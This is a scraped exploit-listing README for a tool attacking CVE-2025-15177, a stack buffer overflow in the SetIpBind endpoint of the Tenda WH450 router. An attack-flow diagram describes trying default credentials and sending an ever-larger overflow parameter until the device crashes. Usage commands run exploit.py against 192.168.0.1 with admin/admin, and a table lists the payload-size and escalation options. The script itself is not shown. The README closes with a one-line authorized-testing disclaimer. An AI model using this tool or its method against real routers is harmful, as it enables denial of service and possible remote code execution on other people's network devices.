Share
## https://sploitus.com/exploit?id=23B57775-A1D9-5A8F-BCAA-ED8E76313379
# CVE-2025-15177

**Tenda WH450 V1.0.0.18 Stack Buffer Overflow**

## Overview

Stack-based buffer overflow in `/goform/SetIpBind` endpoint allowing DoS or potential RCE.

| Field | Value |
|-------|-------|
| Product | Tenda WH450 |
| Version | V1.0.0.18 |
| Type | Stack Buffer Overflow |
| Vector | HTTP GET (authenticated) |
| Impact | DoS / Potential RCE |

## Attack Flow

```mermaid
flowchart LR
    A[Attacker] --> B[Authenticate]
    B --> C{Auth OK?}
    C -->|Yes| D[Send Overflow]
    C -->|No| E[Try Defaults]
    E --> C
    D --> F["SetIpBind Endpoint"]
    F --> G["page=AAAA..."]
    G --> H{Crash?}
    H -->|Yes| I[DoS Success]
    H -->|No| J[Escalate Size]
    J --> D
```

## Usage

```bash
python exploit.py 

python exploit.py 192.168.0.1

python exploit.py 192.168.0.1 --escalate

python exploit.py 192.168.0.1 -u admin -p admin -s 500
```

## Parameters

| Flag | Description | Default |
|------|-------------|---------|
| `-s, --size` | Payload size | 240 |
| `-u, --username` | Auth username | empty |
| `-p, --password` | Auth password | empty |
| `-t, --timeout` | Request timeout | 10 |
| `--escalate` | Try multiple sizes | off |

## Requirements

```
requests
```

## Disclaimer

For authorized security testing only.